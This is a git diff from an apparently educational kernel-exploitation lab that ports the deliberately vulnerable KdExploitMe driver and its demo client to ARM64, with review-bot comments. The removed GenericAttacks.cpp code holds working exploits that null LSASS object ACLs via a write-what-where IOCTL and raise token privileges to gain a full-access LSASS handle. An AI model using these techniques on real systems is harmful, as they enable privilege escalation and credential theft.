diff --git a/ARM64/Debug/ExploitDemos.exe b/ARM64/Debug/ExploitDemos.exe
new file mode 100644
index 0000000..3c8d2dd
Binary files /dev/null and b/ARM64/Debug/ExploitDemos.exe differ
diff --git a/ARM64/Debug/ExploitDemos.ilk b/ARM64/Debug/ExploitDemos.ilk
new file mode 100644
index 0000000..bd22ebe
Binary files /dev/null and b/ARM64/Debug/ExploitDemos.ilk differ
diff --git a/ARM64/Debug/ExploitDemos.pdb b/ARM64/Debug/ExploitDemos.pdb
new file mode 100644
index 0000000..47dca5a
Binary files /dev/null and b/ARM64/Debug/ExploitDemos.pdb differ
diff --git a/ARM64/Win8.1 Release/KdExploitMe.pdb b/ARM64/Win8.1 Release/KdExploitMe.pdb
new file mode 100644
index 0000000..87a365f
Binary files /dev/null and b/ARM64/Win8.1 Release/KdExploitMe.pdb differ
diff --git a/ARM64/Win8.1Release/KdExploitMe.inf b/ARM64/Win8.1Release/KdExploitMe.inf
new file mode 100644
index 0000000..bae7fcd
--- /dev/null
+++ b/ARM64/Win8.1Release/KdExploitMe.inf
@@ -0,0 +1,32 @@
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer = 12/28/2025,11.25.39.263
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTARM64
+
+[Standard.NTARM64]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
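Review bot: The [Version] section at L27–L33 leaves Class, ClassGuid, Provider and CatalogFile empty, and [SourceDisksFiles] and [Standard.NTARM64] at L42 and L48 contain no file or model entries, so this INF cannot stage or install the driver and would be rejected by inf2cat and signature checks. If this is only a wizard placeholder for the ARM64 package, a header comment such as `; Placeholder INF - class, provider, catalog and model entries still to be filled in` would make that explicit; otherwise it needs the driver's class and ClassGuid, a Provider string, a CatalogFile name and a model line for the driver binary before it is usable. The directory name `Win8.1Release` here also differs from `Win8.1 Release` used for the ARM64 KdExploitMe.pdb in the same commit, which looks like two build outputs landing in different folders.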
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.Build.CppClean.log b/ExploitDemos/ARM64/Debug/ExploitDemos.Build.CppClean.log
new file mode 100644
index 0000000..d91b080
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.Build.CppClean.log
@@ -0,0 +1,8 @@
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\vc143.pdb
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\stdafx.obj
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\pooloverflow.obj
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\helpers.obj
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\genericattacks.obj
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\exploitdemos.tlog\cl.command.1.tlog
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\exploitdemos.tlog\cl.read.1.tlog
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\exploitdemos.tlog\cl.write.1.tlog
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.exe.recipe b/ExploitDemos/ARM64/Debug/ExploitDemos.exe.recipe
new file mode 100644
index 0000000..f2732bc
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.exe.recipe
@@ -0,0 +1,11 @@
+
+
+
+
+ C:\Users\ayush\Source\Repos\KdExploitMe\ARM64\Debug\ExploitDemos.exe
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.log b/ExploitDemos/ARM64/Debug/ExploitDemos.log
new file mode 100644
index 0000000..7278855
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.log
@@ -0,0 +1,16 @@
+ KernelAddressLeak.cpp
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(90,9): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'ULONG_PTR'
+ C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(90,9):
+ consider using '%lli' in the format string
+ C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(90,9):
+ consider using '%Ii' in the format string
+ C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(90,9):
+ consider using '%I64i' in the format string
+
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(141,40): warning C4312: 'type cast': conversion from 'DWORD' to 'HANDLE' of greater size
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(159,9): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'size_t'
+ C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(159,9):
+ consider using '%zi' in the format string
+
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(245,39): warning C4312: 'type cast': conversion from 'DWORD' to 'HANDLE' of greater size
+ ExploitDemos.vcxproj -> C:\Users\ayush\Source\Repos\KdExploitMe\ARM64\Debug\ExploitDemos.exe
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.obj b/ExploitDemos/ARM64/Debug/ExploitDemos.obj
new file mode 100644
index 0000000..bd33305
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.obj differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.command.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..b888cb9
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.command.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.read.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..abc8688
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.read.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.write.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..c2f6e47
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.write.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/Cl.items.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/Cl.items.tlog
new file mode 100644
index 0000000..1e98842
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/Cl.items.tlog
@@ -0,0 +1,6 @@
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\GenericAttacks.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\GenericAttacks.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ExploitDemos.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\ExploitDemos.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\Helpers.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\Helpers.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\KernelAddressLeak.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\PoolOverflow.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\PoolOverflow.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\stdafx.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\stdafx.obj
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/ExploitDemos.lastbuildstate b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/ExploitDemos.lastbuildstate
new file mode 100644
index 0000000..785ca3c
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/ExploitDemos.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.44.35207:TargetPlatformVersion=10.0.26100.0:
+Debug|ARM64|C:\Users\ayush\Source\Repos\KdExploitMe\|
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.command.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.command.1.tlog
new file mode 100644
index 0000000..e80c419
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.command.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.read.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.read.1.tlog
new file mode 100644
index 0000000..fb56e2d
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.read.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.secondary.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.secondary.1.tlog
new file mode 100644
index 0000000..bfd2489
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.secondary.1.tlog
@@ -0,0 +1,2 @@
+^C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\EXPLOITDEMOS.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\GENERICATTACKS.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\HELPERS.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\KERNELADDRESSLEAK.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\POOLOVERFLOW.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\STDAFX.OBJ
+C:\Users\ayush\Source\Repos\KdExploitMe\ARM64\Debug\ExploitDemos.ILK
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.write.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.write.1.tlog
new file mode 100644
index 0000000..f6231b3
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.write.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.vcxproj.FileListAbsolute.txt b/ExploitDemos/ARM64/Debug/ExploitDemos.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..e69de29
diff --git a/ExploitDemos/ARM64/Debug/GenericAttacks.obj b/ExploitDemos/ARM64/Debug/GenericAttacks.obj
new file mode 100644
index 0000000..948fa30
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/GenericAttacks.obj differ
diff --git a/ExploitDemos/ARM64/Debug/Helpers.obj b/ExploitDemos/ARM64/Debug/Helpers.obj
new file mode 100644
index 0000000..bf04b6d
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/Helpers.obj differ
diff --git a/ExploitDemos/ARM64/Debug/KernelAddressLeak.obj b/ExploitDemos/ARM64/Debug/KernelAddressLeak.obj
new file mode 100644
index 0000000..301b461
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/KernelAddressLeak.obj differ
diff --git a/ExploitDemos/ARM64/Debug/PoolOverflow.obj b/ExploitDemos/ARM64/Debug/PoolOverflow.obj
new file mode 100644
index 0000000..fe8aa28
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/PoolOverflow.obj differ
diff --git a/ExploitDemos/ARM64/Debug/stdafx.obj b/ExploitDemos/ARM64/Debug/stdafx.obj
new file mode 100644
index 0000000..95055dd
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/stdafx.obj differ
diff --git a/ExploitDemos/ARM64/Debug/vc143.pdb b/ExploitDemos/ARM64/Debug/vc143.pdb
new file mode 100644
index 0000000..3017491
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/vc143.pdb differ
diff --git a/ExploitDemos/ExploitDemos.cpp b/ExploitDemos/ExploitDemos.cpp
index cf09ee6..9b29f9c 100644
--- a/ExploitDemos/ExploitDemos.cpp
+++ b/ExploitDemos/ExploitDemos.cpp
@@ -1,87 +1,88 @@
-#pragma once
-
-#include "stdafx.h"
-#include "GenericAttacks.h"
-#include "PoolOverflow.h"
-#include "KernelAddressLeak.h"
-#include
-
-using namespace std;
-
-void PrintHelpMenu()
-{
- printf("ExploitDemos Help:\n");
- printf("Demonstrates exploiting the KdExploitMe driver.\n");
- printf("--------------\n");
- printf("ExploitDemos.exe -ExploitNumber\n");
- printf(" -01 : Demo METHOD_WRITEWHATWHERE - NULL EPROCESS ACL.\n");
- printf(" -02 : Demo METHOD_DECADDRESS - Modify token privileges.\n");
- printf(" -03 : Demo METHOD_OVERFLOWPOOL - 0xbad0b0b0, Non-Paged Pool, 64bit only.\n");
-}
-
-int _tmain(int argc, _TCHAR* argv[])
-{
- string dummy = NULL;
- if (argc != 2)
- {
- PrintHelpMenu();
- return -1;
- }
-
- printf("Press any key and hit enter to continue...\n");
- cin >> dummy;
-
- HANDLE hDevice;
- DWORD errNum;
-
-
- UNREFERENCED_PARAMETER(argc);
- UNREFERENCED_PARAMETER(argv);
-
- //
- // open the device
- //
-
- if ((hDevice = CreateFile(L"\\\\.\\KdExploitMe",
- GENERIC_READ | GENERIC_WRITE,
- 0,
- NULL,
- CREATE_ALWAYS,
- FILE_ATTRIBUTE_NORMAL,
- NULL)) == INVALID_HANDLE_VALUE) {
-
- errNum = GetLastError();
-
- printf("- CreateFile failed! Error code = 0x%x\n", errNum);
-
- return 0;
- }
-
-
- int exploitNumber = stoi(argv[1]+1);
- switch (exploitNumber)
- {
- case 1:
- AttackWriteWhatWhere(hDevice);
- break;
- case 2:
- AttackDecAddress(hDevice);
- break;
- case 3:
- AttackPO_BAD0B0B0(hDevice);
- break;
- default:
- PrintHelpMenu();
- break;
- }
-
-
- //
- // close the handle to the device.
- //
- CloseHandle(hDevice);
-}
-
-
-
-
+#pragma once
+
+#include "stdafx.h"
+#include "GenericAttacks.h"
+#include "PoolOverflow.h"
+#include "KernelAddressLeak.h"
+#include
+
+using namespace std;
+
+void PrintHelpMenu()
+{
+ printf("ExploitDemos Help:\n");
+ printf("Demonstrates exploiting the KdExploitMe driver.\n");
+ printf("--------------\n");
+ printf("ExploitDemos.exe -ExploitNumber\n");
+ printf(" -01 : Demo METHOD_WRITEWHATWHERE - NULL EPROCESS ACL.\n");
+ printf(" -02 : Demo METHOD_DECADDRESS - Modify token privileges.\n");
+ printf(" -03 : Demo METHOD_OVERFLOWPOOL - 0xbad0b0b0, Non-Paged Pool, 64bit only.\n");
+}
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+ string dummy = NULL;
+ if (argc != 2)
+ {
+ PrintHelpMenu();
+ return -1;
+ }
+
+ printf("Press any key and hit enter to continue...\n");
+ cin >> dummy;
+
+ HANDLE hDevice;
+ DWORD errNum;
+
+
+ UNREFERENCED_PARAMETER(argc);
+ UNREFERENCED_PARAMETER(argv);
+
+ //
+ // open the device
+ //
+
+ if ((hDevice = CreateFileA("\\\\.\\KdExploitMe",
+ GENERIC_READ | GENERIC_WRITE,
+ 0,
+ NULL,
+ CREATE_ALWAYS,
+ FILE_ATTRIBUTE_NORMAL,
+ NULL)) == INVALID_HANDLE_VALUE) {
+
+ errNum = GetLastError();
+
+ printf("- CreateFile failed! Error code = 0x%x\n", errNum);
+
+ return 0;
+ }
+
+
+ int exploitNumber = stoi(argv[1]+1);
+ switch (exploitNumber)
+ {
+ case 1:
+ AttackWriteWhatWhere(hDevice);
+ break;
+ case 2:
+ AttackDecAddress(hDevice);
+ break;
+ case 3:
+ AttackPO_BAD0B0B0(hDevice);
+ break;
+ default:
+ PrintHelpMenu();
+ break;
+ }
+
+
+ //
+ // close the handle to the device.
+ //
+ CloseHandle(hDevice);
+}
+
+
+
+
+
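Review bot: `string dummy = NULL;` at L307 constructs a std::string from a null pointer, which is undefined behaviour and aborts or throws before the argc check on the next line can ever run; declare it as `string dummy;` instead. The hunk rewrites the whole file although the only functional change is `CreateFile(L"...")` becoming `CreateFileA("...")` at L328, so this looks like a line-ending normalization folded into a code change; committing the normalization separately would make the real change reviewable. The project builds as Unicode (`_tmain`, `_TCHAR`), so switching this one call to the narrow-string API is inconsistent with the rest of the file even though it compiles; `CreateFileW(L"\\\\.\\KdExploitMe", ...)` would keep it consistent. The failure paths also disagree with each other, returning -1 for bad arguments at L311 but 0 when the device open fails at L340, so a caller or script cannot tell the failed open apart from success.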
diff --git a/ExploitDemos/ExploitDemos.vcxproj b/ExploitDemos/ExploitDemos.vcxproj
index a0b176b..f04ff56 100644
--- a/ExploitDemos/ExploitDemos.vcxproj
+++ b/ExploitDemos/ExploitDemos.vcxproj
@@ -1,175 +1,190 @@
-
-
-
-
- Debug
- Win32
-
-
- Debug
- x64
-
-
- Release
- Win32
-
-
- Release
- x64
-
-
-
- {D6194E14-75CE-456F-8771-2C7EF4455384}
- Win32Proj
- ExploitDemos
-
-
-
- Application
- true
- v120
- Unicode
-
-
- Application
- true
- v120
- Unicode
-
-
- Application
- false
- v120
- true
- Unicode
-
-
- Application
- false
- v120
- true
- Unicode
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- true
-
-
- true
-
-
- false
-
-
- false
-
-
-
- Use
- Level3
- Disabled
- WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
- true
-
-
- Console
- true
-
-
-
-
- Use
- Level3
- Disabled
- WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
- true
-
-
- Console
- true
-
-
-
-
- Level3
- Use
- MaxSpeed
- true
- true
- WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
- true
- Sync
- Default
- MultiThreaded
-
-
- Console
- true
- true
- true
-
-
-
-
- Level3
- Use
- MaxSpeed
- true
- true
- WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
- true
- Sync
- CompileAsCpp
- MultiThreaded
-
-
- Console
- true
- true
- true
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- Create
- Create
- Create
- Create
-
-
-
-
-
+
+
+
+
+ Debug
+ ARM64
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ ARM64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {D6194E14-75CE-456F-8771-2C7EF4455384}
+ Win32Proj
+ ExploitDemos
+ 10.0.26100.0
+
+
+
+ Application
+ true
+ v143
+ Unicode
+
+
+ Application
+ true
+ v143
+ Unicode
+
+
+ Application
+ false
+ v143
+ true
+ Unicode
+
+
+ Application
+ false
+ v143
+ true
+ Unicode
+
+
+ v143
+
+
+ v143
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
+ true
+ Sync
+ Default
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
+ true
+ Sync
+ CompileAsCpp
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
\ No newline at end of file
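Review bot: The new ARM64 Debug and Release configurations at L613–L617 appear to carry only a v143 toolset entry, with no ConfigurationType, CharacterSet, ClCompile or Link groups of their own (the XML tags are stripped in this rendering, so this is inferred), which means the ARM64 build inherits toolchain defaults rather than the WIN32/_DEBUG/_CONSOLE and Console-subsystem settings the other four configurations define. The commit also checks in the ARM64/Debug build outputs (.exe, .ilk, .obj, .pdb, .tlog files and the build logs); these are regenerated on every build and belong in .gitignore, not in the repository. The checked-in ExploitDemos.log already records C4477 (`%i` used with ULONG_PTR and size_t arguments) and C4312 (DWORD-to-HANDLE cast) warnings in KernelAddressLeak.cpp, which are genuine 64-bit correctness problems on ARM64 and worth fixing as part of this port rather than carrying into the new target.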
diff --git a/ExploitDemos/ExploitDemos.vcxproj.filters b/ExploitDemos/ExploitDemos.vcxproj.filters
index 2ac7689..93deed9 100644
--- a/ExploitDemos/ExploitDemos.vcxproj.filters
+++ b/ExploitDemos/ExploitDemos.vcxproj.filters
@@ -1,69 +1,69 @@
-
-
-
-
- {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
- cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
-
-
- {93995380-89BD-4b04-88EB-625FBE52EBFB}
- h;hh;hpp;hxx;hm;inl;inc;xsd
-
-
- {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
- rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
-
-
- {dd2c5aff-a33c-4e30-9142-482508ddec08}
-
-
- {5b888192-e0eb-4efe-adf1-ef8a9fd888c4}
-
-
-
-
-
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files\AttackIOCTL
-
-
- Header Files\AttackIOCTL
-
-
- Header Files
-
-
- Header Files
-
-
-
-
- Source Files
-
-
- Source Files
-
-
- Source Files
-
-
- Source Files\AttackIOCTL
-
-
- Source Files\AttackIOCTL
-
-
- Source Files
-
-
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+ {dd2c5aff-a33c-4e30-9142-482508ddec08}
+
+
+ {5b888192-e0eb-4efe-adf1-ef8a9fd888c4}
+
+
+
+
+
+
+
+ Header Files
+
+
+ Header Files
+
+
+ Header Files
+
+
+ Header Files\AttackIOCTL
+
+
+ Header Files\AttackIOCTL
+
+
+ Header Files
+
+
+ Header Files
+
+
+
+
+ Source Files
+
+
+ Source Files
+
+
+ Source Files
+
+
+ Source Files\AttackIOCTL
+
+
+ Source Files\AttackIOCTL
+
+
+ Source Files
+
+
\ No newline at end of file
diff --git a/ExploitDemos/ExploitDemos.vcxproj.user b/ExploitDemos/ExploitDemos.vcxproj.user
new file mode 100644
index 0000000..0f14913
--- /dev/null
+++ b/ExploitDemos/ExploitDemos.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/ExploitDemos/GenericAttacks.cpp b/ExploitDemos/GenericAttacks.cpp
index 09e3e0b..74a917b 100644
--- a/ExploitDemos/GenericAttacks.cpp
+++ b/ExploitDemos/GenericAttacks.cpp
@@ -1,200 +1,200 @@
-#pragma once
-#include "stdafx.h"
-#include "GenericAttacks.h"
-#include "KernelAddressLeak.h"
-#include "Structures.h"
-
-
-// This function will overwrite the ACL of all objects that LSASS has opened with a NULL ACL.
-// This effectively removes the ACL, which will allow anyone to open a PROCESS_ALL_ACCESS handle to lsass
-// and do DLL injection (or another technique) to elevate to SYSTEM.
-// See https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
-// Test on Windows 6.1 x86/x64
-BOOL AttackWriteWhatWhere(HANDLE hDevice)
-{
- BOOL functionSuccess = false;
- DWORD processId = 0;
- PVOID* objectAddresses = NULL;
- size_t objectCount = 0;
- BOOL bRc = false;
- void* ioctlDest = NULL;
- DATACOPY* dataCopy = NULL;
- void* ioctlSrc = NULL;
- HANDLE hLsass = NULL;
-
- printf("+ Entering AttackWriteWhatWhere.\n");
-
- //Get the process ID of lsass
- BOOL success = GetProcessIdByName(L"lsass.exe", &processId);
- if (!success)
- {
- printf("- Failed to get process by name.\n");
- goto Cleanup;
- }
- printf("+ Process ID of LSASS: 0x%x\n", processId);
-
- //Leak the addresses of all the process handles LSASS has opened
- success = LeakProcessObjectAddresses((HANDLE)processId, &objectAddresses, &objectCount);
- if (!success)
- {
- printf("- Failed to call LeakProcessObjectAddresses.\n");
- goto Cleanup;
- }
-
-
- for (size_t i = 0; i < objectCount; i++)
- {
- //
- // Performing WriteWhatWhere to null process ACL
- //
- DWORD bytesReturned = 0;
- dataCopy = new DATACOPY();
- DWORD overwriteSize = sizeof(PVOID);
- ioctlSrc = malloc(overwriteSize);
- SecureZeroMemory(ioctlSrc, overwriteSize);
-
- dataCopy->Dest = PVOID((UINT_PTR)objectAddresses[i] - overwriteSize);
- dataCopy->DestLength = overwriteSize;
- dataCopy->Source = ioctlSrc;
- dataCopy->SourceLength = overwriteSize;
-
- ioctlDest = malloc(overwriteSize);
-
- printf("+ Overwriting address: 0x%p\n", dataCopy->Dest);
-
- bRc = DeviceIoControl(hDevice,
- (DWORD)IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE,
- dataCopy,
- sizeof(*dataCopy),
- ioctlDest, //Won't actually be used in this exploit
- overwriteSize,
- &bytesReturned,
- NULL
- );
-
-
- if (!bRc)
- {
- printf("- Error in DeviceIoControl : %d\n", GetLastError());
- goto Cleanup;
- }
- }
-
-
- //Attempt to get a handle to LSASS, which is normally not possible, but should be possible after running the exploit
- hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, processId);
- if (!hLsass)
- {
- printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
- printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
-
-
- functionSuccess = true;
-
-Cleanup:
- if (objectAddresses)
- {
- free(objectAddresses);
- objectAddresses = NULL;
- }
- if (ioctlSrc)
- {
- free(ioctlSrc);
- ioctlSrc = NULL;
- }
- if (ioctlDest)
- {
- free(ioctlDest);
- ioctlDest = NULL;
- }
- if (dataCopy)
- {
- delete dataCopy;
- dataCopy = NULL;
- }
- if (hLsass)
- {
- CloseHandle(hLsass);
- hLsass = NULL;
- }
-
- return functionSuccess;
-}
-
-// This will decrement the privileges held by the current process by 1. This will effectively turn on almost all privileges
-// for the process, including SeDebugPrivilege. With SeDebugPrivilege, you can do DLL injection in to any process.
-// See https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
-// Test on Windows 6.1 x86/x64
-BOOL AttackDecAddress(HANDLE hDevice)
-{
- BOOL functionSuccess = false;
- PVOID tokenAddress = NULL;
- PVOID privilegeAddress = NULL;
- BOOL success = false;
- size_t ioctlDest = 0;
- DWORD bytesReturned = 0;
- DECADDRESS inBuf = { 0 };
- HANDLE hLsass = NULL;
- DWORD lsassProcId = 0;
-
- success = LeakCurrentUserTokenAddress(&tokenAddress);
- if (!success)
- {
- printf("- Error calling LeakCurrentUserTokenAddress.\n");
- goto Cleanup;
- }
-
- privilegeAddress = (PVOID)((UINT_PTR)tokenAddress + 0x48);
-
- inBuf.Value = (size_t*)privilegeAddress;
- inBuf.Dec = TRUE;
-
- printf("+ Decrementing memory at address: 0x%p\n", inBuf.Value);
-
- BOOL bRc = DeviceIoControl(hDevice,
- (DWORD)IOCTL_KDEXPLOITME_METHOD_DECADDRESS,
- &inBuf,
- sizeof(inBuf),
- &ioctlDest, //Won't actually be used in this exploit
- sizeof(ioctlDest),
- &bytesReturned,
- NULL
- );
-
- if (!bRc)
- {
- printf("- Error in DeviceIoControl : %d\n", GetLastError());
- goto Cleanup;
- }
-
- //Get the process ID of lsass
- success = GetProcessIdByName(L"lsass.exe", &lsassProcId);
- if (!success)
- {
- printf("- Failed to get process by name.\n");
- goto Cleanup;
- }
- printf("+ Process ID of LSASS: 0x%x\n", lsassProcId);
-
- //Attempt to get a handle to LSASS, which is normally not possible, but should be possible after running the exploit
- hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, lsassProcId);
- if (!hLsass)
- {
- printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
- printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
-
- functionSuccess = true;
-
-Cleanup:
- if (hLsass)
- {
- CloseHandle(hLsass);
- hLsass = NULL;
- }
-
- return functionSuccess;
-}
+#pragma once
+#include "stdafx.h"
+#include "GenericAttacks.h"
